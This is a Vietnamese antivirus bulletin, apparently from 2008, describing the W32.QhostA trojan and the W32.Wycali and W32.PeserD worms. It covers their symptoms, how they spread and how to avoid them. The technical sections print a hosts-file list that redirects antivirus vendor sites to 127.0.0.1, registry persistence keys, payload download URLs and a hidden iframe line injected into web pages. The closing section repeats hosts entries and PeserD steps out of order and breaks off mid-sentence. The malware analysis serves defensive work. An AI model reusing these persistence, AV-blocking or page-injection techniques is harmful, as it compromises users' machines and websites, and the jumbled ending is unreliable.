 Tên malware: W32.QhostA.Trojan  Thuộc họ: W32.Qhost.Trojan  Loại: Trojan  Xuất xứ: Nước ngoài  Ngày phát hiện mẫu: 17/04/2008  Kích thước: 83 Kb  Mức độ phá hoại: Trung bình Nguy cơ:  Làm giảm mức độ an ninh của hệ thống. Hiện tượng:  Không cho người sử dụng truy cập vào các trang web: mcafee.com, kaspersky.com, avast.com Cách thức lây nhiễm:  Phát tán qua các trang web. Cách phòng tránh:  Không nên truy cập vào các trang web độc hại, phần mềm miễn phí. Mô tả kỹ thuật:  Copy bản thân vào file "%SysDir%\iexplore.exe" và tạo key run để khởi động mỗi khi bật máy [HKLM\ \Windows\CurrentVersion\Run] "Microsoft Internet Explorer" = "%SysDir%\iexplore.exe"  Dump ra các file o %SysDir%\%random_name%.exe được phát hiện là QhostADmp. Sửa file host để ngăn không cho người dùng truy nhập vào các trang:  127.0.0.1 www.symantec.com  127.0.0.1 securityresponse.symantec.com  127.0.0.1 downloads1.kaspersky-labs.com  127.0.0.1 downloads2.kaspersky-labs.com  127.0.0.1 downloads3.kaspersky-labs.com  127.0.0.1 downloads4.kaspersky-labs.com  127.0.0.1 downloads5.kaspersky-labs.com  127.0.0.1 www.kaspersky-labs.com  127.0.0.1 symantec.com  127.0.0.1 www.sophos.com  127.0.0.1 sophos.com  127.0.0.1 www.mcafee.com  127.0.0.1 mcafee.com  127.0.0.1 liveupdate.symantecliveupdate.com  127.0.0.1 www.viruslist.com  127.0.0.1 viruslist.com  127.0.0.1 viruslist.com  127.0.0.1 f-secure.com  127.0.0.1 www.f-secure.com  127.0.0.1 kaspersky.com  127.0.0.1 www.avp.com  127.0.0.1 www.kaspersky-labs.com  127.0.0.1 avp.com  127.0.0.1 www.networkassociates.com  127.0.0.1 networkassociates.com  127.0.0.1 www.ca.com  127.0.0.1 ca.com  127.0.0.1 mast.mcafee.com  127.0.0.1 my-etrust.com  127.0.0.1 www.my-etrust.com  127.0.0.1 download.mcafee.com  127.0.0.1 dispatch.mcafee.com  127.0.0.1 secure.nai.com  127.0.0.1 nai.com  127.0.0.1 www.nai.com  127.0.0.1 update.symantec.com  127.0.0.1 updates.symantec.com  127.0.0.1 us.mcafee.com  127.0.0.1 liveupdate.symantec.com  127.0.0.1 customer.symantec.com  127.0.0.1 rads.mcafee.com  127.0.0.1 trendmicro.com  127.0.0.1 www.trendmicro.com  127.0.0.1 vncsvr.com  127.0.0.1 secdreg.org  127.0.0.1 virusscan.jotti.org  127.0.0.1 virustotal.com  127.0.0.1 dnl-eu12.kaspersky-labs.com  127.0.0.1 dnl-eu13.kaspersky-labs.com  127.0.0.1 dnl-cd1.kaspersky-labs.com  127.0.0.1 dnl-ru1.kaspersky-labs.com  127.0.0.1 dnl-ru2.kaspersky-labs.com  127.0.0.1 dnl-ru5.kaspersky-labs.com  127.0.0.1 dnl-cn1.kaspersky-labs.com  127.0.0.1 liveupdatesnet.com  o %SysDir%\%random_name%.exe được phát hiện là AgentProx, ghi key run: [HKLM\ \Windows\CurrentVersion\Run] với giá trị "Advanced DHTML Enable" = %SysDir%\%random_name%.exe Chuyên viên phân tích : Tô Đình Hiệp 11. Bkav1672 (23/05/2008) cập nhật lần thứ 1: VetorDH, WycaliB Malware cập nhật mới nhất:  Tên malware: W32.Wycali.Worm  Thuộc họ: W32.Wycali.Worm  Loại: Worm  Xuất xứ: Trung Quốc  Ngày phát hiện mẫu: 22/05/2008  Kích thước: 9Kb  Mức độ phá hoại: Cao Nguy cơ:  Làm giảm mức độ an ninh của hệ thống.  Mất các file .GHO  Làm hỏng một số file chương trình. Hiện tượng:  Sửa registry.  Không sử dụng được một vài chương trình antivirus. Cách thức lây nhiễm:  Phát tán qua trang web.  Tự động lây nhiễm vào USB.  Lây qua các file thực thi. Cách phòng tránh:  Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại  Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa. Mô tả kỹ thuật:  Tắt các process : avp.exe, kvsrvxp.exe, kissvc.exe  Kiểm tra nếu có process : avp.exe thì đặt lại năm hệ thống thành 2004.  Xóa tất cả các file .GHO  Tìm và lây nhiễm tất cả các file exe ngoại trừ : qq.exe, QQDoctor.exe, QQDoctorMain.exe. Đổi tên session cuối thành ".WYCao" nên một số chương trình ứng dụng sẽ không chạy được.  Download file config từ link : http://x.u[removed]-01.net/x.txt  Đọc file config, nếu sau từ khóa InfeWeb: có đường link thì ghi link đó vào cuối tất cả các file có đuôi : .do, .htm, .html, .shtm, .shtml, .asp, .aspx, .php, .jsp, .cgi, .xml  Download trojan OnlineGames từ các link : http://1.fo[removed]00.net/a1.exe http://1.fo[removed]d00.net/a36.exe Chuyên viên phân tích : Nguyễn Công Cường Một số malware đáng chú ý cập nhật cùng ngày: W32.AmvoDH.Worm, W32.Bilano.Trojan, W32.CyberAle.Adware, W32.DownloadAB.Trojan, W32.KavoXLF.Worm, W32.OnGamesXAA.Trojan, W32.Piery.Trojan, W32.FloodBlack.Trojan, W32.RejoicerC.Worm, W32.SpybotV.Trojan, W32.FakeAlertXA.Trojan, W32.CeekatK.Rootkit, W32.ProxyA.Trojan, W32.VetorDH.PE 12. Bkav1680 - Phát hành lần thứ 2 ngày 28/05/2008, cập nhật QuikMsg, AvpB, CinmusXF, KavoADS, NTRootB, PeserD, PeserE Malware cập nhật mới nhất:  Tên malware: W32.PeserD.Worm  Thuộc họ: W32.Peser.Worm  Loại: Worm  Xuất xứ: Nước ngoài  Ngày phát hiện mẫu: 28/05/2008  Kích thước: 61Kb  Mức độ phá hoại: Cao Nguy cơ:  Làm giảm mức độ an ninh của hệ thống.  Làm hỏng các file thực thi đã được pack. Hiện tượng:  Sửa registry.  Không chạy được một vài chương trình thực thi. Cách thức lây nhiễm:  Phát tán qua trang web.  Tự động lây nhiễm vào USB. Cách phòng tránh:  Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại  Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa. Mô tả kỹ thuật:  Tạo service : "Windows WorkStation" để virus được kích hoạt mỗi khi Windows khởi động  Tạo mutex : "PEINFECT" để chỉ 1 virus cùng loại chạy trên 1 máy.  Copy bản thân thành file có tên "mscrss.exe" vào thư mục %SysDir%  Copy bản thân kèm theo file Autorun.inf vào các ổ USB để lây nhiễm.  Download file từ link : http://ieopen.yhg[removed]es.com/iedown/down/upbho.exe  Chèn thêm vào các file : .cgi, .php, .jsp, .asp, .html, .htm dòng sau : <iframe src="http://pk.yhg[removed]es.com/index.htm" width="0" height="0"></iframe> Tìm và lây nhiễm code độc vào các file *.exe (ngoại trừ thư mục Windows và ProgramFiles), đồng thời ghi bản thân . mcafee.com  127.0.0.1 liveupdate.symantecliveupdate.com  127.0.0.1 www.viruslist.com  127.0.0.1 viruslist.com  127.0.0.1 viruslist.com  127.0.0.1 f-secure.com  127.0.0.1 www.f-secure.com. www.trendmicro.com  127.0.0.1 vncsvr.com  127.0.0.1 secdreg.org  127.0.0.1 virusscan.jotti.org  127.0.0.1 virustotal.com  127.0.0.1 dnl-eu12.kaspersky-labs.com  127.0.0.1 dnl-eu13.kaspersky-labs.com. Tạo service : "Windows WorkStation" để virus được kích hoạt mỗi khi Windows khởi động  Tạo mutex : "PEINFECT" để chỉ 1 virus cùng loại chạy trên 1 máy.  Copy bản thân